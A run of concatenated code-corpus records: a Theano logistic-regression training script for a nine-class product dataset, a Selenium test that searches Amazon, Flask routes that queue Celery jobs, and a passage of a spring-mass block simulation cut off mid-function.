anyone_yes(group)\n count_b += everyone_yes(group)\n\n print(f'Sum (anyone): {count_a}')\n print(f'Sum (everyone): {count_b}')\n","sub_path":"src/day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"153226672","text":"\"\"\"\r\nThis tutorial introduces logistic regression using Theano and stochastic\r\ngradient descent.\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\n\r\n__docformat__ = 'restructedtext en'\r\n\r\nimport six.moves.cPickle as pickle\r\nimport gzip\r\nimport os\r\nimport sys\r\nimport timeit\r\n\r\nimport numpy\r\n\r\nimport theano\r\nimport theano.tensor as T\r\n\r\nimport pdb\r\n\r\nclass LogisticRegression(object):\r\n \"\"\"Multi-class Logistic Regression Class\r\n \"\"\"\r\n\r\n def __init__(self, input, n_in, n_out):\r\n \"\"\" Initialize the parameters of the logistic regression\r\n\r\n :type input: theano.tensor.TensorType\r\n :param input: symbolic variable that describes the input of the\r\n architecture (one minibatch)\r\n\r\n :type n_in: int\r\n :param n_in: number of input units, the dimension of the space in\r\n which the datapoints lie\r\n\r\n :type n_out: int\r\n :param n_out: number of output units, the dimension of the space in\r\n which the labels lie\r\n\r\n \"\"\"\r\n # start-snippet-1\r\n # initialize with 0 the weights W as a matrix of shape (n_in, n_out)\r\n self.W = theano.shared(\r\n value=numpy.zeros(\r\n (n_in, n_out),\r\n 
dtype=theano.config.floatX\r\n ),\r\n name='W',\r\n borrow=True\r\n )\r\n # initialize the biases b as a vector of n_out 0s\r\n self.b = theano.shared(\r\n value=numpy.zeros(\r\n (n_out,),\r\n dtype=theano.config.floatX\r\n ),\r\n name='b',\r\n borrow=True\r\n )\r\n\r\n # W is a matrix where column-k represent the separation hyperplane for\r\n # class-k\r\n # x is a matrix where row-j represents input training sample-j\r\n # b is a vector where element-k represent the free parameter of\r\n # hyperplane-k\r\n self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)\r\n\r\n # symbolic description of how to compute prediction as class whose\r\n # probability is maximal\r\n self.y_pred = T.argmax(self.p_y_given_x, axis=1)\r\n # end-snippet-1\r\n\r\n # parameters of the model\r\n self.params = [self.W, self.b]\r\n\r\n # keep track of model input\r\n self.input = input\r\n\r\n def negative_log_likelihood(self, y):\r\n \"\"\"Return the mean of the negative log-likelihood of the prediction\r\n of this model under a given target distribution.\r\n\r\n :type y: theano.tensor.TensorType\r\n :param y: corresponds to a vector that gives for each example the\r\n correct label\r\n\r\n Note: we use the mean instead of the sum so that\r\n the learning rate is less dependent on the batch size\r\n \"\"\"\r\n # start-snippet-2\r\n # y.shape[0] is the number of rows (N)\r\n # T.arange(y.shape[0]) is a symbolic vector which will contain\r\n # [0,1,2,... n-1]\r\n # T.log(self.p_y_given_x) is a matrix of\r\n # Log-Probabilities (call it LP) with one row per example and\r\n # one column per class LP[T.arange(y.shape[0]),y] is a vector\r\n # v containing [LP[0,y[0]], LP[1,y[1]], LP[2,y[2]], ...,\r\n # LP[n-1,y[n-1]]]\r\n # T.mean(LP[T.arange(y.shape[0]),y]) is\r\n # the mean (across minibatch examples) of the elements in v,\r\n # i.e., the mean log-likelihood across the minibatch.\r\n return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])\r\n # end-snippet-2\r\n\r\n def errors(self, y):\r\n \"\"\"Return a float representing the number of errors in the minibatch\r\n over the total number of examples of the minibatch ; zero one\r\n loss over the size of the minibatch\r\n\r\n :type y: theano.tensor.TensorType\r\n :param y: corresponds to a vector that gives for each example the\r\n correct label\r\n \"\"\"\r\n\r\n # check if y has same dimension of y_pred\r\n if y.ndim != self.y_pred.ndim:\r\n raise TypeError(\r\n 'y should have the same shape as self.y_pred',\r\n ('y', y.type, 'y_pred', self.y_pred.type)\r\n )\r\n # check if y is of the correct datatype\r\n if y.dtype.startswith('int'):\r\n # the T.neq operator returns a vector of 0s and 1s, where 1\r\n # represents a mistake in prediction\r\n return T.mean(T.neq(self.y_pred, y))\r\n else:\r\n raise NotImplementedError()\r\n\r\n\r\ndef load_data(dataset, test_set, num_features):\r\n ''' Loads the dataset\r\n\r\n :type dataset: string\r\n :param dataset: the path to the dataset (here OPCC)\r\n '''\r\n\r\n #############\r\n # LOAD DATA #\r\n #############\r\n\r\n # Load the dataset\r\n # First column has ID numbers and can be excluded from the computation\r\n # Last column has the labels.\r\n data_file = numpy.genfromtxt(dataset, skip_header=1, delimiter=',', usecols = range(1, 95))\r\n test_data = numpy.genfromtxt(test_set, skip_header=1, delimiter=',', usecols = range(1, 95))\r\n \r\n train_target=data_file[0:34650, 93]\r\n test_target=test_data[:, 93]\r\n valid_target=data_file[34650:, 93]\r\n\r\n # Set index to second column\r\n train_target -= 
1\r\n test_target -= 1\r\n valid_target -= 1\r\n\r\n data_file = load_information_gain_model(data_file, num_features)\r\n test_data = load_information_gain_model(test_data, num_features)\r\n\r\n #data_file = load_variance_model(data_file, num_features)\r\n #test_data = load_variance_model(test_data, num_features)\r\n\r\n #data_file = load_correlation_model(data_file, num_features)\r\n #test_data = load_correlation_model(test_data, num_features)\r\n \r\n train_set = (data_file[0:34650, 0:num_features], train_target)\r\n test_set = (test_data[:, 0:num_features], test_target)\r\n valid_set = (data_file[34650:, 0:num_features], valid_target)\r\n \r\n # train_set, valid_set, test_set format: tuple(input, target)\r\n # input is a numpy.ndarray of 2 dimensions (a matrix)\r\n # where each row corresponds to an example. target is a\r\n # numpy.ndarray of 1 dimension (vector) that has the same length as\r\n # the number of rows in the input. It should give the target\r\n # to the example with the same index in the input.\r\n\r\n def shared_dataset(data_xy, borrow=True):\r\n \"\"\" Function that loads the dataset into shared variables\r\n\r\n The reason we store our dataset in shared variables is to allow\r\n Theano to copy it into the GPU memory (when code is run on GPU).\r\n Since copying data into the GPU is slow, copying a minibatch everytime\r\n is needed (the default behaviour if the data is not in a shared\r\n variable) would lead to a large decrease in performance.\r\n \"\"\"\r\n data_x, data_y = data_xy\r\n shared_x = theano.shared(numpy.asarray(data_x,\r\n dtype=theano.config.floatX),\r\n borrow=borrow)\r\n shared_y = theano.shared(numpy.asarray(data_y,\r\n dtype=theano.config.floatX),\r\n borrow=borrow)\r\n # When storing data on the GPU it has to be stored as floats\r\n # therefore we will store the labels as ``floatX`` as well\r\n # (``shared_y`` does exactly that). But during our computations\r\n # we need them as ints (we use labels as index, and if they are\r\n # floats it doesn't make sense) therefore instead of returning\r\n # ``shared_y`` we will have to cast it to int. 
This little hack\r\n        # lets us get around this issue\r\n        return shared_x, T.cast(shared_y, 'int32')\r\n\r\n    test_set_x, test_set_y = shared_dataset(test_set)\r\n    valid_set_x, valid_set_y = shared_dataset(valid_set)\r\n    train_set_x, train_set_y = shared_dataset(train_set)\r\n\r\n    rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y),\r\n            (test_set_x, test_set_y)]\r\n    return rval\r\n\r\ndef load_data_pca(dataset, test_set, pca_set, pca_test, num_features):\r\n    ''' Loads the dataset\r\n\r\n    :type dataset: string\r\n    :param dataset: the path to the dataset (here OPCC)\r\n    '''\r\n\r\n    #############\r\n    # LOAD DATA #\r\n    #############\r\n\r\n    # Load the dataset\r\n    # First column has ID numbers and can be excluded from the computation\r\n    # Last column has the labels.\r\n    data_file = numpy.genfromtxt(dataset, skip_header=1, delimiter=',', usecols = range(1, 95))\r\n    test_data = numpy.genfromtxt(test_set, skip_header=1, delimiter=',', usecols = range(1, 95))\r\n    \r\n    train_target=data_file[0:34650, 93]\r\n    test_target=test_data[:, 93]\r\n    valid_target=data_file[34650:, 93]\r\n\r\n    # Set index to first column\r\n    train_target -= 1\r\n    test_target -= 1\r\n    valid_target -= 1\r\n\r\n    data_file = numpy.genfromtxt(pca_set, delimiter=',')\r\n    test_data = numpy.genfromtxt(pca_test, delimiter=',')\r\n    \r\n    train_set = (data_file[0:34650, 0:num_features], train_target)\r\n    test_set = (test_data[:, 0:num_features], test_target)\r\n    valid_set = (data_file[34650:, 0:num_features], valid_target)\r\n    \r\n    # train_set, valid_set, test_set format: tuple(input, target)\r\n    # input is a numpy.ndarray of 2 dimensions (a matrix)\r\n    # where each row corresponds to an example. target is a\r\n    # numpy.ndarray of 1 dimension (vector) that has the same length as\r\n    # the number of rows in the input. It should give the target\r\n    # to the example with the same index in the input.\r\n\r\n    def shared_dataset(data_xy, borrow=True):\r\n        \"\"\" Function that loads the dataset into shared variables\r\n\r\n        The reason we store our dataset in shared variables is to allow\r\n        Theano to copy it into the GPU memory (when code is run on GPU).\r\n        Since copying data into the GPU is slow, copying a minibatch everytime\r\n        is needed (the default behaviour if the data is not in a shared\r\n        variable) would lead to a large decrease in performance.\r\n        \"\"\"\r\n        data_x, data_y = data_xy\r\n        shared_x = theano.shared(numpy.asarray(data_x,\r\n                                               dtype=theano.config.floatX),\r\n                                 borrow=borrow)\r\n        shared_y = theano.shared(numpy.asarray(data_y,\r\n                                               dtype=theano.config.floatX),\r\n                                 borrow=borrow)\r\n        # When storing data on the GPU it has to be stored as floats\r\n        # therefore we will store the labels as ``floatX`` as well\r\n        # (``shared_y`` does exactly that). But during our computations\r\n        # we need them as ints (we use labels as index, and if they are\r\n        # floats it doesn't make sense) therefore instead of returning\r\n        # ``shared_y`` we will have to cast it to int. 
This little hack\r\n # lets ous get around this issue\r\n return shared_x, T.cast(shared_y, 'int32')\r\n\r\n test_set_x, test_set_y = shared_dataset(test_set)\r\n valid_set_x, valid_set_y = shared_dataset(valid_set)\r\n train_set_x, train_set_y = shared_dataset(train_set)\r\n\r\n rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y),\r\n (test_set_x, test_set_y)]\r\n return rval\r\n\r\ndef load_information_gain_model(dataset, num_vars):\r\n \"\"\" Function that loads the columns based on order from highest to lowest information gain and the number of required columns.\r\n\r\n :type dataset: numPy array (dtype=float)\r\n :param dataset: a matrix of N rows and 93 columns\r\n\r\n :type num_vars: int\r\n :param num_vars: Number of features (columns) to select from the dataset.\r\n\r\n \"\"\"\r\n information_gain_indices = numpy.array([10, 33, 25, 39, 59, 13, 14, 24, 85, 66, 41, 23, 35, 87, 68, 47, 61,\r\n 3, 2, 63, 74, 7, 75, 67, 71, 89, 42, 31, 52, 8, 38, 15, 56, 26,\r\n 32, 84, 69, 29, 53, 58, 16, 19, 34, 49, 70, 37, 79, 0, 77, 40, 91,\r\n 1, 86, 55, 72, 46, 65, 21, 82, 17, 90, 36, 78, 57, 12, 43, 54, 73,\r\n 28, 88, 81, 18, 9, 20, 44, 64, 22, 62, 76, 51, 45, 6, 48, 11, 60,\r\n 92, 30, 4, 27, 80, 50, 5, 83], dtype=numpy.int64)\r\n \r\n information_gain_indices = information_gain_indices[num_vars:]\r\n print(information_gain_indices.shape[0])\r\n\r\n dataset = numpy.delete(dataset, information_gain_indices, 1)\r\n\r\n #pdb.set_trace() \r\n return dataset\r\n\r\ndef load_variance_model(dataset, num_vars):\r\n \"\"\" Function that loads the columns based on order from highest to lowest variance and the number of required columns.\r\n\r\n :type dataset: numPy array (dtype=float)\r\n :param dataset: a matrix of N rows and 93 columns\r\n\r\n :type num_vars: int\r\n :param num_vars: Number of features (columns) to select from the dataset.\r\n\r\n \"\"\"\r\n\r\n variance_indices = numpy.array([72, 66, 18, 89, 23, 57, 68, 53, 14, 73, 8, 63, 33, 39, 34, 38, 74,\r\n 13, 10, 59, 2, 26, 75, 3, 77, 85, 61, 58, 47, 35, 44, 71, 82, 45,\r\n 24, 31, 79, 15, 7, 87, 90, 12, 55, 41, 69, 52, 84, 28, 49, 67, 25,\r\n 42, 29, 88, 86, 37, 16, 0, 21, 19, 46, 48, 43, 65, 17, 32, 78, 92,\r\n 1, 83, 70, 40, 9, 56, 51, 60, 6, 54, 91, 62, 76, 30, 81, 27, 64,\r\n 36, 22, 20, 11, 50, 4, 80, 5], dtype=numpy.int64)\r\n variance_indices = variance_indices[num_vars:]\r\n print(variance_indices.shape[0])\r\n\r\n\r\n dataset = numpy.delete(dataset, variance_indices, 1)\r\n #pdb.set_trace() \r\n return dataset\r\n\r\ndef load_correlation_model(dataset, num_vars):\r\n \"\"\" Function that loads the columns based on order from highest to lowest correlation and the number of required columns.\r\n\r\n :type dataset: numPy array (dtype=float)\r\n :param dataset: a matrix of N rows and 93 columns\r\n\r\n :type num_vars: int\r\n :param num_vars: Number of features (columns) to select from the dataset.\r\n\r\n \"\"\"\r\n correlation_indices = numpy.array([13, 39, 24, 14, 87, 23, 35, 19, 68, 71, 7, 74, 21, 37, 40, 75, 1,\r\n 17, 89, 66, 12, 10, 61, 67, 65, 32, 53, 8, 57, 82, 78, 54, 56, 58,\r\n 3, 59, 79, 2, 34, 90, 91, 25, 6, 46, 27, 63, 48, 43, 70, 36, 18,\r\n 16, 41, 28, 42, 81, 45, 52, 60, 85, 88, 22, 30, 77, 26, 84, 86, 9,\r\n 38, 80, 49, 47, 11, 51, 72, 0, 62, 73, 44, 64, 50, 76, 92, 5, 4,\r\n 69, 55, 29, 33, 31, 20, 15, 83], dtype=numpy.int64)\r\n correlation_indices = correlation_indices[num_vars:]\r\n print(correlation_indices.shape[0])\r\n\r\n\r\n dataset = numpy.delete(dataset, correlation_indices, 1)\r\n 
#pdb.set_trace() \r\n return dataset\r\n\r\ndef sgd_optimization_opcc(learning_rate=0.05, n_epochs=1000,\r\n dataset='OPCCTrain.csv',\r\n test_set = 'OPCCTest.csv',\r\n batch_size=600):\r\n \"\"\"\r\n Demonstrate stochastic gradient descent optimization of a log-linear\r\n model\r\n\r\n This is demonstrated on the OPCC dataset.\r\n\r\n :type learning_rate: float\r\n :param learning_rate: learning rate used (factor for the stochastic\r\n gradient)\r\n\r\n :type n_epochs: int\r\n :param n_epochs: maximal number of epochs to run the optimizer\r\n\r\n :type dataset: string\r\n :param dataset: the csv filename\r\n\r\n \"\"\"\r\n #datasets = load_data(dataset, test_set, 68)\r\n #datasets = load_data(dataset, test_set, 86)\r\n #datasets = load_data(dataset, test_set, 92)\r\n #datasets = load_data(dataset, test_set, 93)\r\n\r\n #PCA\r\n #datasets = load_data_pca(dataset, test_set, 'xTrain_PCA_68.csv', 'xTest_PCA_68.csv', 68)\r\n #datasets = load_data_pca(dataset, test_set, 'xTrain_PCA_86.csv', 'xTest_PCA_86.csv', 86)\r\n datasets = load_data_pca(dataset, test_set, 'xTrain_PCA_92.csv', 'xTest_PCA_92.csv', 92)\r\n\r\n train_set_x, train_set_y = datasets[0]\r\n valid_set_x, valid_set_y = datasets[1]\r\n test_set_x, test_set_y = datasets[2]\r\n\r\n #Calculate D - dimension\r\n num_features = train_set_x.shape[1].eval()\r\n\r\n # compute number of minibatches for training, validation and testing\r\n n_train_batches = train_set_x.get_value(borrow=True).shape[0] // batch_size\r\n n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] // batch_size\r\n n_test_batches = test_set_x.get_value(borrow=True).shape[0] // batch_size\r\n\r\n ######################\r\n # BUILD ACTUAL MODEL #\r\n ######################\r\n print('... building the model')\r\n\r\n # allocate symbolic variables for the data\r\n index = T.lscalar() # index to a [mini]batch\r\n\r\n # generate symbolic variables for input (x and y represent a\r\n # minibatch)\r\n x = T.matrix('x') # data, presented as rasterized images\r\n y = T.ivector('y') # labels, presented as 1D vector of [int] labels\r\n\r\n # Each OPCC product has size 93 features\r\n classifier = LogisticRegression(input=x, n_in=num_features, n_out=9)\r\n\r\n # the cost we minimize during training is the negative log likelihood of\r\n # the model in symbolic format\r\n cost = classifier.negative_log_likelihood(y)\r\n\r\n # compiling a Theano function that computes the mistakes that are made by\r\n # the model on a minibatch\r\n test_model = theano.function(\r\n inputs=[index],\r\n outputs=classifier.errors(y),\r\n givens={\r\n x: test_set_x[index * batch_size: (index + 1) * batch_size],\r\n y: test_set_y[index * batch_size: (index + 1) * batch_size]\r\n }\r\n )\r\n\r\n validate_model = theano.function(\r\n inputs=[index],\r\n outputs=classifier.errors(y),\r\n givens={\r\n x: valid_set_x[index * batch_size: (index + 1) * batch_size],\r\n y: valid_set_y[index * batch_size: (index + 1) * batch_size]\r\n }\r\n )\r\n\r\n # compute the gradient of cost with respect to theta = (W,b)\r\n g_W = T.grad(cost=cost, wrt=classifier.W)\r\n g_b = T.grad(cost=cost, wrt=classifier.b)\r\n\r\n # specify how to update the parameters of the model as a list of\r\n # (variable, update expression) pairs.\r\n updates = [(classifier.W, classifier.W - learning_rate * g_W),\r\n (classifier.b, classifier.b - learning_rate * g_b)]\r\n\r\n # compiling a Theano function `train_model` that returns the cost, but in\r\n # the same time updates the parameter of the model based on the rules\r\n # defined in 
`updates`\r\n train_model = theano.function(\r\n inputs=[index],\r\n outputs=cost,\r\n updates=updates,\r\n givens={\r\n x: train_set_x[index * batch_size: (index + 1) * batch_size],\r\n y: train_set_y[index * batch_size: (index + 1) * batch_size]\r\n }\r\n )\r\n\r\n ###############\r\n # TRAIN MODEL #\r\n ###############\r\n print('... training the model')\r\n # early-stopping parameters\r\n patience = 5000 # look as this many examples regardless\r\n patience_increase = 3 # wait this much longer when a new best is\r\n # found\r\n improvement_threshold = 0.995 # a relative improvement of this much is\r\n # considered significant\r\n validation_frequency = min(n_train_batches, patience // 2)\r\n # go through this many\r\n # minibatche before checking the network\r\n # on the validation set; in this case we\r\n # check every epoch\r\n\r\n best_validation_loss = numpy.inf\r\n test_score = 0.\r\n start_time = timeit.default_timer()\r\n\r\n done_looping = False\r\n epoch = 0\r\n while (epoch < n_epochs) and (not done_looping):\r\n epoch = epoch + 1\r\n for minibatch_index in range(n_train_batches):\r\n\r\n minibatch_avg_cost = train_model(minibatch_index)\r\n # iteration number\r\n iter = (epoch - 1) * n_train_batches + minibatch_index\r\n\r\n if (iter + 1) % validation_frequency == 0:\r\n # compute zero-one loss on validation set\r\n validation_losses = [validate_model(i)\r\n for i in range(n_valid_batches)]\r\n this_validation_loss = numpy.mean(validation_losses)\r\n\r\n print(\r\n 'epoch %i, minibatch %i/%i, validation error %f %%' %\r\n (\r\n epoch,\r\n minibatch_index + 1,\r\n n_train_batches,\r\n this_validation_loss * 100.\r\n )\r\n )\r\n\r\n # if we got the best validation score until now\r\n if this_validation_loss < best_validation_loss:\r\n #improve patience if loss improvement is good enough\r\n if this_validation_loss < best_validation_loss * \\\r\n improvement_threshold:\r\n patience = max(patience, iter * patience_increase)\r\n\r\n best_validation_loss = this_validation_loss\r\n # test it on the test set\r\n\r\n test_losses = [test_model(i)\r\n for i in range(n_test_batches)]\r\n test_score = numpy.mean(test_losses)\r\n\r\n print(\r\n (\r\n ' epoch %i, minibatch %i/%i, test error of'\r\n ' best model %f %%'\r\n ) %\r\n (\r\n epoch,\r\n minibatch_index + 1,\r\n n_train_batches,\r\n test_score * 100.\r\n )\r\n )\r\n\r\n # save the best model\r\n with open('best_model.pkl', 'wb') as f:\r\n pickle.dump(classifier, f)\r\n\r\n if patience <= iter:\r\n done_looping = True\r\n break\r\n\r\n end_time = timeit.default_timer()\r\n print(\r\n (\r\n 'Optimization complete with best validation score of %f %%,'\r\n 'with test performance %f %%'\r\n )\r\n % (best_validation_loss * 100., test_score * 100.)\r\n )\r\n print('The code run for %d epochs, with %f epochs/sec' % (\r\n epoch, 1. 
* epoch / (end_time - start_time)))\r\n print(('The code for file ' +\r\n os.path.split(__file__)[1] +\r\n ' ran for %.1fs' % ((end_time - start_time))), file=sys.stderr)\r\n\r\n\r\ndef predict():\r\n \"\"\"\r\n An example of how to load a trained model and use it\r\n to predict labels.\r\n \"\"\"\r\n\r\n # load the saved model\r\n classifier = pickle.load(open('best_model.pkl', 'rb'))\r\n\r\n # compile a predictor function\r\n predict_model = theano.function(\r\n inputs=[classifier.input],\r\n outputs=classifier.y_pred)\r\n\r\n # We can test it on some examples from test test\r\n dataset='OPCCTrain.csv'\r\n test_set='OPCCTest.csv'\r\n #datasets = load_data(dataset, test_set, 68)\r\n datasets = load_data(dataset, test_set, 86)\r\n #datasets = load_data(dataset, test_set, 92)\r\n #datasets = load_data(dataset, test_set, 93)\r\n\r\n test_set_x, test_set_y = datasets[2]\r\n test_set_x = test_set_x.get_value()\r\n test_set_y = test_set_y.eval()\r\n\r\n print(test_set_y[:10])\r\n predicted_values = predict_model(test_set_x)\r\n print(\"Predicted values for the first 10 examples in test set:\")\r\n print(predicted_values[:10])\r\n\r\n errors = 0\r\n for i in range(len(test_set_y)):\r\n if predicted_values[i] != test_set_y[i]:\r\n errors = errors+1\r\n\r\n error_rate = (errors / len(test_set_y)) * 100\r\n print(error_rate)\r\n\r\n #print(predicted_values)\r\n\r\n\r\nif __name__ == '__main__':\r\n sgd_optimization_opcc()\r\n #predict()\r\n","sub_path":"Neural Net/logistic_sgd.py","file_name":"logistic_sgd.py","file_ext":"py","file_size_in_byte":24091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"636525131","text":"# Python code to demonstrate working of unittest\r\nimport unittest\r\n# import _json\r\nfrom selenium import webdriver\r\ndriver = webdriver.Chrome()\r\ndriver.implicitly_wait(10)\r\n\r\nclass web_page:\r\n def __init__(self, baseurl, search_area, submit_button):\r\n self.baseurl = baseurl\r\n self.search_area = search_area\r\n self.submit_button = submit_button\r\n\r\nclass search_element:\r\n def __init__(self, keyword, location, path, path_new):\r\n self.keyword = keyword\r\n self.location = location\r\n self.path = path\r\n self.path_new = path_new\r\n\r\n#define my instance\r\nsearch_element = search_element(\"LEGO\", 'window.scrollTo(0, 964.8)', '//*[@id=\"search\"]/div[1]/div[2]//span[4]/div[1]/div[3]//span//div[2]/div[2]//div[1]//div[1]/h2/a/span', '//*[@id=\"productTitle\"]')\r\nweb_page = web_page('https://amazon.com', 'twotabsearchtextbox', '//*[@id=\"nav-search\"]/form/div[2]/div/input')\r\n\r\n\r\nclass TestSearchFunctionality(unittest.TestCase):\r\n def setUp(self) -> None:\r\n # define search area and submit button\r\n driver.get(web_page.baseurl)\r\n driver.maximize_window()\r\n self.search_area = driver.find_element_by_id(web_page.search_area)\r\n self.submit_button = driver.find_elements_by_xpath(web_page.submit_button)[0]\r\n # type text\r\n self.search_area.send_keys(search_element.keyword)\r\n # search the text\r\n self.submit_button.click()\r\n #scroll the window to desired location\r\n driver.execute_script(search_element.location)\r\n #open the searched item\r\n self.search_results = driver.find_elements_by_xpath(search_element.path)[0]\r\n self.search_results.click()\r\n #locate the item\r\n self.new_window = driver.find_elements_by_xpath(search_element.path_new)[0]\r\n def tearDown(self) -> None:\r\n driver.quit()\r\n def test_run(self):\r\n self.assertEqual(str(self.search_results), 
str(self.new_window))\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","sub_path":"Homework6.py","file_name":"Homework6.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"104101878","text":"from flask import request\nfrom flask.json import jsonify\nfrom flask_restful import Resource\nfrom flask_pydantic import validate\n\nfrom messenger.schema.job import RunSuiteBase, RunTemplateBase\nfrom messenger.utils.response_util import RET\nfrom celeryservice.tasks import run_suite, run_template\n\n\nclass RunSuiteEvent(Resource):\n @validate()\n def post(self, body: RunSuiteBase):\n _body = body.__dict__\n _user_id = _body.pop(\"user_id\")\n\n _user = {\n \"user_id\": _user_id,\n \"auth\": request.headers.get(\"authorization\"),\n }\n\n run_suite.delay(_body, _user)\n\n return jsonify(\n error_code=RET.OK, \n error_msg=\"succeed in creating the job for running suite\"\n )\n\n\nclass RunTemplateEvent(Resource):\n @validate()\n def post(self, body: RunTemplateBase):\n _body = body.__dict__\n _user_id = _body.pop(\"user_id\")\n _user = {\n \"user_id\": _user_id,\n \"auth\": request.headers.get(\"authorization\"),\n }\n run_template.delay(_body, _user)\n\n return jsonify(\n error_code=RET.OK, \n error_msg=\"succeed in creating the job for running template\"\n )\n","sub_path":"radiaTest-messenger/messenger/apps/job/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"51228569","text":"VERSION_NAME = 'SAPCOR_v04h'\n\n# MODULE NAME\nMODULE_NAME_THIS__FORCE_BLOCK_V_F = VERSION_NAME+'_Force_Block_V_F'\n\n###############################################################################\n#{ SYSTEM INITIALIZATION\n\nimport glob\n\n# -------------------------------------------------------------------\n# MODULE NAMES TO BE IMPORTED\nMODULE_NAMES_FORCE_BLOCK_V_F = []\nMODULE_NAMES_FORCE_BLOCK_V_F.append('Misc')\nMODULE_NAMES_FORCE_BLOCK_V_F.append('Input')\n# -------------------------------------------------------------------\n\n# -------------------------------------------------------------------\n# Import Modules\nfor Module_Name in MODULE_NAMES_FORCE_BLOCK_V_F:\n FileName = VERSION_NAME+'_'+Module_Name+'_Build*.py'\n FList = glob.glob(FileName)\n assert len(FList)!=0,'ERROR: Module not found : '+FileName\n FList.sort()\n FileName = FList[-1][0:-3]\n exec('from '+FileName+' import *')\n# -------------------------------------------------------------------\n\n\nfrom numpy import loadtxt\nfrom numpy import array,zeros,hstack\n\n#}#############################################################################\n\n\n#-------------------------------------------------------------------------\ndef Force_Block_V_F (w,t,Core,K,L,Accel,POST=False,FO_DIR=FO_DIR):\n#{\n #{ DESCRIPTION \n \"\"\"\n Defines the differential equations for the coupled spring-mass system.\n\n Arguments:\n w : vector of the state variables at time, t:\n w = [U,DU,W,DW,R,DR,...]\n t : time\n Core : Var space\n \"\"\"\n #}\n\n #{ VERBOSE\n if '/Force/' in VERBOSE:\n Verbose('')\n Verbose('time=%e, (K,L)=(%d,%d)'%(t,K,L))\n #} \n\n#=========================================================================\n#{ INITIALIZATION\n \n # Column Size\n N = Core['N'][K]\n\n #{ Get Block Prop of (K,L)\n# BN = Core['Array'][K][L]\n BN = Core['BTNsKL'][K][L]\n BT = BlockTypes[BN]\n A = BT['a']\n H = BT['h']\n M = BT['M']\n I = 
BT['I']\n Kv = BT['Kv']\n Cv = BT['Cv']\n mu_s = BT['mu_s']\n mu_k = BT['mu_k']\n d_mu = BT['d_mu']\n xi_F_cr = BT['xi_F_cr']\n# Fixed = BT['Fixed']\n #}\n\n #{ Get Block Prop of (K,L-1)\n # Subscript, m, means 'Minus 1'\n if L!=1:\n #{\n# BN = Core['Array'][K][L-1]\n BN = Core['BTNsKL'][K][L-1]\n BT = BlockTypes[BN]\n# Am = BT['a']\n Hm = BT['h']\n Mm = BT['M']\n Im = BT['I']\n# Kvm = BT['Kv']\n# Cvm = BT['Cv']\n# Fixedm = BT['Fixed']\n #}\n else:\n #{\n if Core['Flag_CSB']==True: # CSB\n BT = BlockTypes['CSB']\n Hm = 0\n Mm = BT['M']\n Im = BT['I']\n else: # Base\n Hm = 0\n Mm = Im = 1\n #} \n #}\n\n # Get current state of (K,L)\n U,DU,W,DW,R,DR = GetSolFromVect(Core,w,K,L) # U,DU,W,DW,R,DR\n\n #{ Get current state of (K,L-1)\n # If L==1:\n # It means lower component is CSB or Base.\n # If Flag_CSB==True: Get state of CSB (which means (K,L)==(1,0))\n # Else : Get state of Base (which means (K,L)==(0,0))\n if L!=1:\n Um,DUm,Wm,DWm,Rm,DRm = GetSolFromVect(Core,w,K,L-1) # U,DU,W,DW,R,DR\n else:\n \t#{\n if Core['Flag_CSB']==True:\n Um,DUm,Wm,DWm,Rm,DRm = GetSolFromVect(Core,w,1,0) # CSB\n else:\n Um,DUm,Wm,DWm,Rm,DRm = GetSolFromVect(Core,w,0,0) # Base\n #}\n #} \n \n# INITIALIZATION\n#}========================================================================\n\n##############################################################################\n#{ VERTICAL FORCES #\n# #\n# #\n\n#(v04f) if Core['ApplyForces']['Block_V']==True:\n# ['Block_V'] is already checked in VectorField()\n\n #{ Spring Contraction between (K,L-1)~(K,L)\n if L!=1:\n Gamma_L = Wm - Hm * (1-cos( Rm )) + A * sin( Rm )\n Gamma_L -= W + H * (1-cos( R )) + A * sin( R )\n Gamma_L *= 0.5\n Gamma_R = Wm - Hm * (1-cos( Rm )) - A * sin( Rm )\n Gamma_R -= W + H * (1-cos( R )) - A * sin( R )\n Gamma_R *= 0.5\n\n DGamma_L = DWm - ( Hm * sin( Rm ) - A * cos( Rm ) ) * DRm\n DGamma_L -= DW + ( H * sin( R ) + A * cos( R ) ) * DR\n DGamma_L *= 0.5\n DGamma_R = DWm - ( Hm * sin( Rm ) + A * cos( Rm ) ) * DRm\n DGamma_R -= DW + ( H * sin( R ) - A * cos( R ) ) * DR\n DGamma_R *= 0.5\n else: # Interaction between CSB(or Base)~(K,1)\n Gamma_L = Wm\n Gamma_L -= W + H * (1-cos( R )) + A * sin( R )\n Gamma_L *= 0.5\n Gamma_R = Wm\n Gamma_R -= W + H * (1-cos( R )) - A * sin( R )\n Gamma_R *= 0.5\n\n DGamma_L = DWm\n DGamma_L -= DW + ( H * sin( R ) + A * cos( R ) ) * DR\n DGamma_L *= 0.5\n DGamma_R = DWm\n DGamma_R -= DW + ( H * sin( R ) - A * cos( R ) ) * DR\n DGamma_R *= 0.5\n #}\n \n #{ Forces and Moments\n F_VL, F_VR = 0,0\n M_VL, M_VR, M_VLm, M_VRm = 0,0,0,0\n \n if Gamma_L>0.:\n F_VL = Kv * Gamma_L + Cv * DGamma_L\n if Gamma_R>0.:\n F_VR = Kv * Gamma_R + Cv * DGamma_R\n\n #---------------------------\n # ELIMINATE STICKING FORCE\n #---------------------------\n if FLAG_NoStickForce == True:\n#(v04f)\n# if M_VL < 0. : M_VL = 0.\n# if M_VR < 0. : M_VR = 0.\n# if M_VLm > 0. : M_VLm = 0.\n# if M_VRm > 0. : M_VRm = 0.\n if F_VL < 0. : F_VL = 0.\n if F_VR < 0. 
